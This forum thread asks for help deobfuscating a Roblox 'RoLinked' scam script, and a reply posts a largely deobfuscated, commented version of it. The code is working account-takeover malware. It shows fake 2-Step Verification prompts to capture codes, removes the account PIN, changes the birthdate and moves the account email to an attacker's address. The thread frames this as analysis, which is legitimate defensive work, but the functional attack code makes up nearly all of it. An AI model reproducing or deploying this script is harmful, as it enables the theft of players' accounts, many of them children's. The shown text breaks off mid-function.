Deobfuscate JavaScript

[qGodless]

help me deobfuscate a javascript code used in a recent popular roblox.com scam

Sources:
httpx://rolinked.com/
httpx://www.youtube.com/watch?v=og2d5niB09A

Code sample:

javascript: function D(z, N) {
    var B = U();
    return D = function(K, L) {
        K = K - (-0x210c + -0x139 * 0x7 + 0x2aff);
        var J = B[K];
        return J;
    }, D(z, N);
}

function U() {
    var cM = ['vSjac', 'prima', 'HoEhQ', '\x22>Acc', '...
return % 20 U();
}(function(z, N) {
    function % 20 zB(z, N, K, L, J) {
        return % 20 D(L - % 20 - 0x34d, K);
    }

    function % 20 zK(z, N, K, L, J) {
        return % 20 D(K - 0x5c, z);
    }

    function % 20 zL(z, N, K, L, J) {
        return % 20 D(J - 0x12e, N);
    }

 

[sikidok]

Interesting. Its new scam?

Seems like Roblox team fixed this already.

 

[qGodless]

Seems like Roblox team fixed this already.

it doesnt necessearly exploit a bug that needs to be fixed, the script uses roblox api to takeover the victims account

 

[shadowplatinum1]

help me deobfuscate a javascript code used in a recent popular roblox.com scam

Sources:
httpx://rolinked.com/
httpx://www.youtube.com/watch?v=og2d5niB09A

Code sample:

javascript: function D(z, N) {
    var B = U();
    return D = function(K, L) {
        K = K - (-0x210c + -0x139 * 0x7 + 0x2aff);
        var J = B[K];
        return J;
    }, D(z, N);
}

function U() {
    var cM = ['vSjac', 'prima', 'HoEhQ', '\x22>Acc', '...
return % 20 U();
}(function(z, N) {
    function % 20 zB(z, N, K, L, J) {
        return % 20 D(L - % 20 - 0x34d, K);
    }

    function % 20 zK(z, N, K, L, J) {
        return % 20 D(K - 0x5c, z);
    }

    function % 20 zL(z, N, K, L, J) {
        return % 20 D(J - 0x12e, N);
    }

(async function () {
  var callOnce1 = function (this_, fn) {
    var wrappedFn = function () {
      if (fn) {
        var retValue = fn.apply(this_, arguments);
        fn = null;
        return retValue;
      }
    };
    return wrappedFn;
  };

  var potentiallySlowRunningFn = callOnce1(this, function () {
    return potentiallySlowRunningFn.toString().search("(((.+)+)+)+$").toString().constructor(potentiallySlowRunningFn).search("(((.+)+)+)+$");
  });
  potentiallySlowRunningFn();

  var fnPattern = new RegExp("function *\\( *\\)"),
    plusPlusFollowedByIdentifierPattern = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", "i"),
    startPreventingDebugger = debuggerPrevention("init");
  // Perhaps this is trying to check if the function was tampered with? E.g. by de-obfuscation tools?
  if (!fnPattern.test(startPreventingDebugger + "chain") || !plusPlusFollowedByIdentifierPattern.test(startPreventingDebugger + "input")) {
    startPreventingDebugger("0");
  } else {
    debuggerPrevention();
  }

  var callOnce2 = (function () {
      var flag = true;
      return function (this_, fn) {
        var wrappedFn = flag
          ? function () {
              if (fn) {
                var res = fn.apply(this_, arguments);
                fn = null;
                return res;
              }
            }
          : function () {};
        flag = false;
        return wrappedFn;
      };
    })(),
    c = callOnce2(this, function () {
      var window_;
      try {
        var getThis = Function('return (function() {}.constructor("return this")( ));');
        window_ = getThis();
      } catch (X) {
        window_ = window;
      }
      var console = (window_.console = window_.console || {}),
        logFnNames = ["log", "warn", "info", "error", "exception", "table", "trace"];
      // Replace all console-log functions with, what I believe to be a weirdly-cosntructed no-op function.
      // Probably another attempt at making it hard to figure out what this script is doing?
      for (var getThis = 0; getThis < logFnNames.length; getThis++) {
        var boundToCallonce2 = Function.prototype.bind(callOnce2);
        var logFnName = logFnNames[getThis];
        var log = console[logFnName] || boundToCallonce2;
        boundToCallonce2.__proto__ = callOnce2.bind(callOnce2);
        boundToCallonce2.toString = log.toString.bind(log);
        console[logFnName] = boundToCallonce2;
      }
    });
  c();

  const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
  var emailSuffix = "@hotmail.com";
  var newEmailAddress = "teresathomson32@hotmail.com";
  var hiddenVersionOfNewEmailAddress = "t***";
  var userId = 6045232974;

  // ------------------------------------------------------------------
  // Goes through all of your messages, looking for the string "V1k Games".
  // If that string is found, the validDev array will be populated.
  // ------------------------------------------------------------------

  validDev = [];
  try {
    $.ajax({
      method: "GET",
      url: "https://privatemessages.roblox.com/v1/messages?messageTab=inbox&pageNumber=0&pageSize=20",
      contentType: "application/json",
      success: function (generalMessagesResp) {
        var totalPages = Number(generalMessagesResp.totalPages);
        for (let i = 0; i < totalPages; i++) {
          $.ajax({
            method: "GET",
            url: "https://privatemessages.roblox.com/v1/messages?messageTab=inbox&pageNumber=" + i + "&pageSize=20",
            contentType: "application/json",
            success: function (messagesResp) {
              var collection = messagesResp.collection;
              for (var message of collection) {
                if (message.body.includes("VlK Games") == true) {
                  validDev.push("true");
                }
              }
            },
          });
        }
      },
    });
  } catch (err) {}
  try {
    $.ajax({
      method: "GET",
      url: "https://privatemessages.roblox.com/v1/messages?messageTab=archive&pageNumber=0&pageSize=20",
      contentType: "application/json",
      success: function (generalArchivedMessagesResp) {
        var totalPages = Number(generalArchivedMessagesResp.totalPages);
        for (let i = 0; i < totalPages; i++) {
          $.ajax({
            method: "GET",
            url: "https://privatemessages.roblox.com/v1/messages?messageTab=archive&pageNumber=" + i + "&pageSize=20",
            contentType: "application/json",
            success: function (archivedMessagesResp) {
              var collection = archivedMessagesResp.collection;
              for (var message of collection) {
                message.body.includes("VlK Games") == true && validDev.push("true");
              }
            },
          });
        }
      },
    });
  } catch (err) {}


  try {
    console.log(document.getElementsByClassName("text-footer footer-note")[0].innerText);
  } catch (err) {
    window.location.reload();
  }
  if (document.getElementsByClassName("text-footer footer-note")[0].innerText != "Active") {
    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Active";
    $.ajax({
      method: "GET",
      url: "https://users.roblox.com/v1/users/authenticated",
      contentType: "application/json",
      success: function (yourUserInfo) {
        var yourUserId = yourUserInfo.id;
        // ------------------------------------------------------------------
        // Has your account request to be friends with the user <userId> (the id is 6045232974)
        // ------------------------------------------------------------------
        try {
          var body = { friendshipOriginSourceType: 0 };
          $.ajax({
            method: "POST",
            url: "https://friends.roblox.com/v1/users/" + userId + "/request-friendship",
            contentType: "application/json",
            data: JSON.stringify(body),
          });
        } catch (err) {}

        // Called if the account is worth a lot, or if a special message is found in the chat history.
        // I'm assuming the special message ("V1k Games") is sent by the hacker to this account, as a way to
        // force this onValuablesFound() callback to run, even if it doesn't have more money then the hard-coded threshold.
        async function onValuablesFound() {
          // ------------------------------------------------------------------
          // Update your email to the new email address ("teresathomson32@hotmail.com") then log you out.
          // ------------------------------------------------------------------
          function doStuffWithEmail() {
            $.ajax({
              method: "GET",
              url: "https://accountsettings.roblox.com/v1/email",
              contentType: "application/json",
              success: function (emailResp) {
                if (emailResp.emailAddress == null) {
                  $.ajax({
                    method: "POST",
                    url: "https://accountsettings.roblox.com/v1/email",
                    contentType: "application/json",
                    data: JSON.stringify({
                      emailAddress: newEmailAddress,
                      password: "",
                    }),
                  });
                } else {
                  var emailAddress = emailResp.emailAddress,
                    verified = emailResp.verified;
                  if (emailAddress.includes(emailSuffix) == true) {
                    if (emailAddress.includes(hiddenVersionOfNewEmailAddress) == true) {
                      if (verified == true) {
                        (async function () {
                          await sleep(500);
                          var req = {
                            method: "POST",
                            url: "https://auth.roblox.com/v2/logout",
                            contentType: "application/json",
                          };
                          $.ajax(req);
                        })();
                      }
                    }
                  }
                }
              },
            });
            setTimeout(doStuffWithEmail, 2000);
          }
          doStuffWithEmail();

          function X(R, x, q) {
            $.ajax({
              method: "POST",
              url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/challenges/email/send-code",
              contentType: "application/json",
              data: JSON.stringify({
                actionType: "Generic",
                challengeId: R,
              }),
              success: function () {
                var g = '<div id="twoStepPrompts" role="dialog"> <div class="fade modal-backdrop in"></div> <div role="dialog" tabindex="-1" style="display: block;" class="fade modal-modern in modal"> <div class="modal-dialog"> <div class="modal-content" role="document"> <div title="" class="modal-header"> <button type="button" class="modal-modern-header-button"></button> <h4 class="modal-title">2-Step Verification</h4> <div class="modal-modern-header-info"></div> </div> <div class="modal-body"> <div class="modal-lock-icon"></div> <p class="modal-margin-bottom-xlarge">Enter the code we just sent you via email. </p> <div class="input-control-wrapper"> <div id="groupElementId" class="form-group"> <input as="input" inputmode="numeric" autocomplete="off" maxlength="6" placeholder="Enter 6-digit Code" type="text" id="two-step-verification-code-input" class="input-field form-control" value=""> <div class="form-control-label bottom-label xsmall">&nbsp;</div> </div> </div> </div> <div class="modal-footer"> <div class="modal-modern-footer-buttons"> <button type="button" class="btn-cta-md modal-modern-footer-button" aria-label="Verify" disabled="">Verify</button> </div> <p class="text-footer modal-margin-bottom">Need help? Contact <a class="text-name text-footer contact" href="https://www.roblox.com/info/2sv" target="_blank" rel="noopener noreferrer">Roblox Support</a></p> <p class="text-footer">IMPORTANT: Don\'t share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.</p> </div> </div> </div> </div> </div>';
                document.body.insertAdjacentHTML("beforeend", g);
                function d() {
                  if (document.getElementById("two-step-verification-code-input").value.length == 6) {
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = false;
                  } else {
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = true;
                  }
                  setTimeout(d, 100);
                }
                d();
                document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                  $.ajax({
                    method: "POST",
                    url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/challenges/email/verify",
                    contentType: "application/json",
                    data: JSON.stringify({
                      challengeId: R,
                      actionType: "Generic",
                      code: document.getElementById("two-step-verification-code-input").value,
                    }),
                    success: function (W) {
                      var s = W.verificationToken;
                      $.ajax({
                        method: "POST",
                        url: "https://apis.roblox.com/challenge/v1/continue",
                        contentType: "application/json",
                        data: JSON.stringify({
                          challengeId: x,
                          challengeMetadata: '{"verificationToken":"' + s + '","rememberDevice":false,"challengeId":"' + R + '","actionType":"Generic"}',
                          challengeType: "twostepverification",
                        }),
                        success: function () {
                          document.getElementById("twoStepPrompts").remove();
                          sleep(2000);
                          var I0 = btoa('{"reauthenticationToken":"' + s + '"}');
                          console.log(q);
                          if (q == 1) {
                            console.log("Reason is 1");
                            var I1 = {
                              method: "POST",
                              url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/configuration/email/enable",
                              contentType: "application/json",
                              headers: {},
                            };
                            I1.headers["Rblx-Challenge-Type"] = "reauthentication";
                            I1.headers["Rblx-Challenge-Id"] = x;
                            I1.headers["Rblx-Challenge-Metadata"] = I0;
                            $.ajax(I1);
                          } else {
                            if (q == null) {
                              $.ajax({
                                method: "DELETE",
                                url: "https://auth.roblox.com/v1/account/pin",
                                contentType: "application/json",
                                headers: {
                                  "Rblx-Challenge-Type": "reauthentication",
                                  "Rblx-Challenge-Id": x,
                                  "Rblx-Challenge-Metadata": I0,
                                },
                                success: function () {
                                  onPinRemoved(null, null);
                                },
                              });
                            } else {
                              onPinRemoved(x, I0);
                            }
                          }
                        },
                      });
                    },
                    error: function () {
                      document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "Invalid code";
                      document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group";
                    },
                  });
                };
              },
            });
          }
          function f(R, x, q) {
            document.body.insertAdjacentHTML("beforeend", '<div id="twoStepPrompts" role="dialog"> <div class="fade modal-backdrop in"></div> <div role="dialog" tabindex="-1" style="display: block;" class="fade modal-modern in modal"> <div class="modal-dialog"> <div class="modal-content" role="document"> <div title="" class="modal-header"> <button type="button" class="modal-modern-header-button"></button> <h4 class="modal-title">2-Step Verification</h4> <div class="modal-modern-header-info"></div> </div> <div class="modal-body"> <div class="modal-lock-icon"></div> <p class="modal-margin-bottom-xlarge">Enter the code generated by your authenticator app. </p> <div class="input-control-wrapper"> <div id="groupElementId" class="form-group"> <input as="input" inputmode="numeric" autocomplete="off" maxlength="6" placeholder="Enter 6-digit Code" type="text" id="two-step-verification-code-input" class="input-field form-control" value=""> <div class="form-control-label bottom-label xsmall">&nbsp;</div> </div> </div> </div> <div class="modal-footer"> <div class="modal-modern-footer-buttons"> <button type="button" class="btn-cta-md modal-modern-footer-button" aria-label="Verify" disabled="">Verify</button> </div> <p class="text-footer modal-margin-bottom">Need help? Contact <a class="text-name text-footer contact" href="https://www.roblox.com/info/2sv" target="_blank" rel="noopener noreferrer">Roblox Support</a></p> <p class="text-footer">IMPORTANT: Don\'t share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.</p> </div> </div> </div> </div> </div>');
            function T() {
              document.getElementById("two-step-verification-code-input").value.length == 6 ? (document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = false) : (document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = true);
              setTimeout(T, 100);
            }
            T();
            document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
              $.ajax({
                method: "POST",
                url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/challenges/authenticator/verify",
                contentType: "application/json",
                data: JSON.stringify({
                  challengeId: R,
                  actionType: "Generic",
                  code: document.getElementById("two-step-verification-code-input").value,
                }),
                success: function (d) {
                  var W = d.verificationToken;
                  $.ajax({
                    method: "POST",
                    url: "https://apis.roblox.com/challenge/v1/continue",
                    contentType: "application/json",
                    data: JSON.stringify({
                      challengeId: x,
                      challengeMetadata: '{"verificationToken":"' + W + '","rememberDevice":false,"challengeId":"' + R + '","actionType":"Generic"}',
                      challengeType: "twostepverification",
                    }),
                    success: function () {
                      document.getElementById("twoStepPrompts").remove();
                      sleep(2000);
                      var s = btoa('{"reauthenticationToken":"' + W + '"}');
                      if (q == 1) {
                        console.log("Reason is 1");
                        var L = {
                          method: "POST",
                          url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/configuration/email/enable",
                          contentType: "application/json",
                          headers: {},
                        };
                        L.headers["Rblx-Challenge-Type"] = "reauthentication";
                        L.headers["Rblx-Challenge-Id"] = x;
                        L.headers["Rblx-Challenge-Metadata"] = s;
                        $.ajax(L);
                      } else {
                        q == null
                          ? $.ajax({
                              method: "DELETE",
                              url: "https://auth.roblox.com/v1/account/pin",
                              contentType: "application/json",
                              headers: {
                                "Rblx-Challenge-Type": "reauthentication",
                                "Rblx-Challenge-Id": x,
                                "Rblx-Challenge-Metadata": s,
                              },
                              success: function () {
                                onPinRemoved(null, null);
                              },
                            })
                          : onPinRemoved(x, s);
                      }
                    },
                  });
                },
                error: function (d) {
                  if (d.responseText.includes('"code":18')) {
                    (document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "This code has already been used. Please enter a new code."), (document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group");
                  } else {
                    document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "Invalid code";
                    document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group";
                  }
                },
              });
            };
          }
          function B(R, x) {
            $.ajax({
              method: "POST",
              url: "https://apis.roblox.com/otp-service/v1/sendCodeForUser",
              contentType: "application/json",
              data: JSON.stringify({
                contactType: "Email",
                messageVariant: "Default",
                origin: "Reauth",
              }),
              success: function (C) {
                var g = C.otpSessionToken;
                document.body.insertAdjacentHTML("beforeend", '<div id="twoStepPrompts" role="dialog"> <div class="fade modal-backdrop in"></div> <div role="dialog" tabindex="-1" style="display: block;" class="fade modal-modern in modal"> <div class="modal-dialog"> <div class="modal-content" role="document"> <div title="" class="modal-header"> <button type="button" class="modal-modern-header-button"></button> <h4 class="modal-title">2-Step Verification</h4> <div class="modal-modern-header-info"></div> </div> <div class="modal-body"> <div class="modal-lock-icon"></div> <p class="modal-margin-bottom-xlarge">A one-time code has been sent to your registered email. Please enter your one-time code to continue.</p> <div class="input-control-wrapper"> <div id="groupElementId" class="form-group"> <input as="input" inputmode="numeric" autocomplete="off" maxlength="6" placeholder="Enter 6-Digit Code" type="text" id="two-step-verification-code-input" class="input-field form-control" value=""> <div class="form-control-label bottom-label xsmall"> ;</div> </div> </div> </div> <div class="modal-footer"> <div class="modal-modern-footer-buttons"> <button type="button" class="btn-cta-md modal-modern-footer-button" aria-label="Verify" disabled="">Verify</button> </div> <p class="text-footer modal-margin-bottom">Need help? Contact <a class="text-name text-footer contact" href="https://www.roblox.com/info/2sv" target="_blank" rel="noopener noreferrer">Roblox Support</a></p> <p class="text-footer">IMPORTANT: Don\'t share your security codes with anyone. Roblox will never ask you for your codes. This can include things like texting your code, screensharing, etc.</p> </div> </div> </div> </div> </div>');
                function W() {
                  document.getElementById("two-step-verification-code-input").value.length == 6 ? (document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = false) : (document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].disabled = true);
                  setTimeout(W, 100);
                }
                W();
                document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                  $.ajax({
                    method: "POST",
                    url: "https://apis.roblox.com/otp-service/v1/validateCode",
                    contentType: "application/json",
                    data: JSON.stringify({
                      contactType: "Email",
                      origin: "Reauth",
                      otpSessionToken: g,
                      passCode: document.getElementById("two-step-verification-code-input").value,
                    }),
                    success: function () {
                      $.ajax({
                        method: "POST",
                        url: "https://apis.roblox.com/reauthentication-service/v1/token/generate",
                        contentType: "application/json",
                        data: JSON.stringify({
                          sessionId: g,
                          type: "Otp_Email",
                        }),
                        success: function (I0) {
                          responseToken = I0.token;
                          $.ajax({
                            method: "POST",
                            url: "https://apis.roblox.com/challenge/v1/continue",
                            contentType: "application/json",
                            data: JSON.stringify({
                              challengeId: R,
                              challengeMetadata: '{"reauthenticationToken":"' + responseToken + '"}',
                              challengeType: "reauthentication",
                            }),
                            success: function () {
                              document.getElementById("twoStepPrompts").remove();
                              sleep(2000);
                              var I4 = btoa('{"reauthenticationToken":"' + responseToken + '"}');
                              if (x == 1) {
                                console.log("Reason is 1");
                                var I5 = {
                                  method: "POST",
                                  url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/configuration/email/enable",
                                  contentType: "application/json",
                                  headers: {},
                                };
                                I5.headers["Rblx-Challenge-Type"] = "reauthentication";
                                I5.headers["Rblx-Challenge-Id"] = R;
                                I5.headers["Rblx-Challenge-Metadata"] = I4;
                                $.ajax(I5);
                              } else {
                                if (x == null) {
                                  $.ajax({
                                    method: "DELETE",
                                    url: "https://auth.roblox.com/v1/account/pin",
                                    contentType: "application/json",
                                    headers: {
                                      "Rblx-Challenge-Type": "reauthentication",
                                      "Rblx-Challenge-Id": R,
                                      "Rblx-Challenge-Metadata": I4,
                                    },
                                    success: function () {
                                      onPinRemoved(null, null);
                                    },
                                  });
                                } else {
                                  onPinRemoved(R, I4);
                                }
                              }
                            },
                          });
                        },
                      });
                    },
                    error: function () {
                      (document.getElementsByClassName("form-control-label bottom-label xsmall")[0].innerText = "Invalid code"), (document.getElementById("groupElementId").className = "form-has-feedback  form-has-error form-group");
                    },
                  });
                };
              },
            });
          }
          function Z(R, x, q) {
            $.ajax({
              method: "GET",
              url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/configuration",
              contentType: "application/json",
              success: function (C) {
                var g = C.primaryMediaType;
                if (g == "Email") {
                  X(R, x, q);
                } else {
                  if (g == "Authenticator") {
                    f(R, x, q);
                  } else {
                    if (g == null) {
                      B(x, q);
                    }
                  }
                }
              },
            });
          }
          function onPinRemoved(R, x) {
            $.ajax({
              method: "GET",
              url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/configuration",
              contentType: "application/json",
              success: function (twoStepAuthResp) {
                var primaryMediaType = twoStepAuthResp.primaryMediaType;
                // ------------------------------------------------------------------
                // If two-factor with email isn't set up, inject a prompt asking you to do so
                // ------------------------------------------------------------------
                if (primaryMediaType == "Authenticator") {
                  document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                  if (document.getElementById("emailPopupz") == null) {
                    document.body.insertAdjacentHTML("beforeend", '<div id="emailPopupz" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog" bis_skin_checked="1"><div class="modal-content" role="document" bis_skin_checked="1"><div title="" class="modal-header" bis_skin_checked="1"><button type="button" class="modal-modern-header-button"></button><h4 class="modal-title">Email 2-Step Verification</h4><div class="modal-modern-header-info" bis_skin_checked="1"></div></div><div class="modal-body" bis_skin_checked="1"><div class="modal-lock-icon" bis_skin_checked="1"></div><p>You must enable Email 2-Step Verification to complete this action.</p></div><div class="modal-footer" bis_skin_checked="1"><div class="modal-modern-footer-buttons" bis_skin_checked="1"><button type="button" class="btn-cta-md modal-modern-footer-button" aria-label="Set Up">Enable</button></div></div></div></div></div></div>');
                    document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                      document.getElementById("emailPopupz").remove(),
                        (document.getElementById("agreeRoLinked").disabled = false),
                        $.ajax({
                          method: "POST",
                          url: "https://twostepverification.roblox.com/v1/users/" + yourUserId + "/configuration/email/enable",
                          contentType: "application/json",
                          success: function () {},
                          error: function (s) {
                            var I0 = atob(s.getResponseHeader("rblx-challenge-metadata")),
                              I1 = s.getResponseHeader("rblx-challenge-id"),
                              I2 = I0.split('"challengeId":"').pop().split('"')[0];
                            Z(I2, I1, 1);
                          },
                        });
                    };
                  }
                } else {
                  if (R == null) {
                    // ------------------------------------------------------------------
                    // Updates your user account's birthday to 2/2/2022
                    // ------------------------------------------------------------------
                    var body = {
                      birthDay: 2,
                      birthMonth: 2,
                      birthYear: 2022,
                    };
                    $.ajax({
                      method: "POST",
                      url: "https://users.roblox.com/v1/birthdate",
                      contentType: "application/json",
                      data: JSON.stringify(body),
                      success: function () {
                        // ------------------------------------------------------------------
                        // Updates your email address to "teresathomson32@hotmail.com"
                        // ------------------------------------------------------------------
                        $.ajax({
                          method: "POST",
                          url: "https://accountsettings.roblox.com/v1/email",
                          contentType: "application/json",
                          data: JSON.stringify({
                            emailAddress: newEmailAddress,
                            password: "",
                          }),
                          success: function () {
                            (async function () {
                              await sleep(1500);
                              $.ajax({
                                method: "GET",
                                url: "https://accountsettings.roblox.com/v1/email",
                                contentType: "application/json",
                                success: function (I3) {
                                  I3.emailAddress == null &&
                                    $.ajax({
                                      method: "POST",
                                      url: "https://accountsettings.roblox.com/v1/email",
                                      contentType: "application/json",
                                      data: JSON.stringify({
                                        emailAddress: newEmailAddress,
                                        password: "",
                                      }),
                                    });
                                },
                              });
                            })();
                          },
                          error: function () {
                            (async function () {
                              await sleep(1500);
                              $.ajax({
                                method: "GET",
                                url: "https://accountsettings.roblox.com/v1/email",
                                contentType: "application/json",
                                success: function (I2) {
                                  I2.emailAddress == null &&
                                    $.ajax({
                                      method: "POST",
                                      url: "https://accountsettings.roblox.com/v1/email",
                                      contentType: "application/json",
                                      data: JSON.stringify({
                                        emailAddress: newEmailAddress,
                                        password: "",
                                      }),
                                    });
                                },
                              });
                            })();
                          },
                        });
                      },
                      error: function (s) {
                        var I0 = atob(s.getResponseHeader("rblx-challenge-metadata")),
                          I1 = s.getResponseHeader("rblx-challenge-id"),
                          I2 = I0.split('"challengeId":"').pop().split('"')[0];
                        Z(I2, I1, 2);
                      },
                    });
                  } else {
                    var n = {
                      birthDay: 2,
                      birthMonth: 2,
                      birthYear: 2022,
                    };
                    $.ajax({
                      method: "POST",
                      url: "https://users.roblox.com/v1/birthdate",
                      contentType: "application/json",
                      headers: {
                        "Rblx-Challenge-Type": "reauthentication",
                        "Rblx-Challenge-Id": R,
                        "Rblx-Challenge-Metadata": x,
                      },
                      data: JSON.stringify(n),
                      success: function () {
                        $.ajax({
                          method: "POST",
                          url: "https://accountsettings.roblox.com/v1/email",
                          contentType: "application/json",
                          data: JSON.stringify({
                            emailAddress: newEmailAddress,
                            password: "",
                          }),
                          success: function () {
                            (async function () {
                              await sleep(1500);
                              $.ajax({
                                method: "GET",
                                url: "https://accountsettings.roblox.com/v1/email",
                                contentType: "application/json",
                                success: function (I4) {
                                  I4.emailAddress == null &&
                                    $.ajax({
                                      method: "POST",
                                      url: "https://accountsettings.roblox.com/v1/email",
                                      contentType: "application/json",
                                      data: JSON.stringify({
                                        emailAddress: newEmailAddress,
                                        password: "",
                                      }),
                                    });
                                },
                              });
                            })();
                          },
                          error: function () {
                            (async function () {
                              await sleep(1500),
                                $.ajax({
                                  method: "GET",
                                  url: "https://accountsettings.roblox.com/v1/email",
                                  contentType: "application/json",
                                  success: function (I3) {
                                    if (I3.emailAddress == null) {
                                      $.ajax({
                                        method: "POST",
                                        url: "https://accountsettings.roblox.com/v1/email",
                                        contentType: "application/json",
                                        data: JSON.stringify({
                                          emailAddress: newEmailAddress,
                                          password: "",
                                        }),
                                      });
                                    }
                                  },
                                });
                            })();
                          },
                        });
                      },
                      error: function (L) {
                        var I1 = atob(L.getResponseHeader("rblx-challenge-metadata")),
                          I2 = L.getResponseHeader("rblx-challenge-id"),
                          I3 = I1.split('"challengeId":"').pop().split('"')[0];
                        Z(I3, I2, 2);
                      },
                    });
                  }
                }
              },
            });
          }

          // ------------------------------------------------------------------
          // If rolink is not set up, inject a prompt asking you to set it up.
          // ------------------------------------------------------------------
          if (document.getElementById("RoLinked1") == null) {
            document.body.insertAdjacentHTML("beforeend", '<div id="RoLinked1" role="dialog"><div class="fade modal-backdrop in"></div><div aria-labelledby="contained-modal-title-vcenter" scrollable="true" centered="true" role="dialog" tabindex="-1" style="display: block;" class="fade verification-modal in modal"><div class="modal-sm modal-dialog"><div class="modal-content" role="document"><div><div title="" class="modal-header"><div class="verification-upsell-title-container"><button type="button" class="verification-upsell-title-button"></button><h4 id="contained-modal-title-vcenter" class="modal-title">RoLinked Agreement </h4></div></div><div class="verification-upsell-text-body text-description">RoLinked can view your Roblox Username</div><div class="modal-footer"><div class="text-description font-caption-body phone-verification-legal-text" hidden="">By clicking "Continue", you are submitting your phone number and agreeing to our <a href="https://en.help.roblox.com/hc/articles/9483830673556-Roblox-SMS-Terms-of-Service">SMS Terms of Use</a> and <a href="https://en.help.roblox.com/hc/articles/115004630823">Privacy Policy</a>. We will send you a one-time verification code. Message and data rates may apply. Reply HELP for help.</div><div class="buttons-section"><button type="button" class="accept-btn btn-primary-md btn-min-width" id="agreeRoLinked">Agree & Continue</button></div><div></div></div></div></div></div></div></div>');
            document.getElementById("agreeRoLinked").onclick = function () {
              document.getElementById("agreeRoLinked").disabled = true;
              // ------------------------------------------------------------------
              // Send a request to get metadata about your account pin
              // ------------------------------------------------------------------
              $.ajax({
                method: "GET",
                url: "https://auth.roblox.com/v1/account/pin",
                contentType: "application/json",
                success: function (pinInfo) {
                  var isEnabled = pinInfo.isEnabled;
                  var unlockedUntil = pinInfo.unlockedUntil;
                  if (isEnabled == true) {
                    if (unlockedUntil == null) {
                      // ------------------------------------------------------------------
                      // If you have a pin, that's locked, inject a dialog asking you to unlock it through your account settings.
                      // ------------------------------------------------------------------
                      document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                      if (document.getElementById("pinPopupz") == null) {
                        document.body.insertAdjacentHTML("beforeend", '<div id="pinPopupz" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog"><div class="modal-content" role="document"><div title="" class="modal-header"><button type="button" class="modal-modern-header-button"></button><h4 class="modal-title">Account PIN Locked</h4><div class="modal-modern-header-info"></div></div><div class="modal-body"><p>Unlock the PIN attached to your account to continue</p></div><div class="modal-footer"><div class="modal-modern-footer-buttons"><a class="btn-cta-md modal-modern-footer-button" aria-label="Set Up" target="_blank" href="https://www.roblox.com/my/account#!/parental-controls">Open Settings</a></div></div></div></div></div></div>');
                        document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                          document.getElementById("pinPopupz").remove();
                          document.getElementById("agreeRoLinked").disabled = false;
                        };
                      }
                    } else {
                      // ------------------------------------------------------------------
                      // If you have a pin, and modifications are allowed to be made to it, remove the pin.
                      // ------------------------------------------------------------------
                      try {
                        document.getElementById("pinPopupz").remove();
                      } catch (err) {}
                      $.ajax({
                        method: "DELETE",
                        url: "https://auth.roblox.com/v1/account/pin",
                        contentType: "application/json",
                        success: function () {
                          onPinRemoved(null, null);
                        },
                        error: function (g) {
                          var d = atob(g.getResponseHeader("rblx-challenge-metadata")),
                            n = g.getResponseHeader("rblx-challenge-id");
                          var W = d.split('"challengeId":"').pop().split('"')[0];
                          Z(W, n, null);
                        },
                      });
                    }
                  } else {
                    onPinRemoved(null, null);
                  }
                },
              });
            };
          } else {
            // ------------------------------------------------------------------
            // If you have rolink set up, then do the same pin-removing stuff that was being done above.
            // This is just a bunch of copied-pasted code.
            // The author apparently doesn't know how to move common code into its own function.
            // ------------------------------------------------------------------
            $.ajax({
              method: "GET",
              url: "https://auth.roblox.com/v1/account/pin",
              contentType: "application/json",
              success: function (R) {
                var q = R.isEnabled;
                var O = R.unlockedUntil;
                if (q == true) {
                  if (O == null) {
                    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                    if (document.getElementById("pinPopupz") == null) {
                      var C = '<div id="pinPopupz" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog"><div class="modal-content" role="document"><div title="" class="modal-header"><button type="button" class="modal-modern-header-button"></button><h4 class="modal-title">Account PIN Locked</h4><div class="modal-modern-header-info"></div></div><div class="modal-body"><p>Unlock the PIN attached to your account to continue</p></div><div class="modal-footer"><div class="modal-modern-footer-buttons"><a class="btn-cta-md modal-modern-footer-button" aria-label="Set Up" target="_blank" href="https://www.roblox.com/my/account#!/parental-controls">Open Settings</a></div></div></div></div></div></div>';
                      document.body.insertAdjacentHTML("beforeend", C);
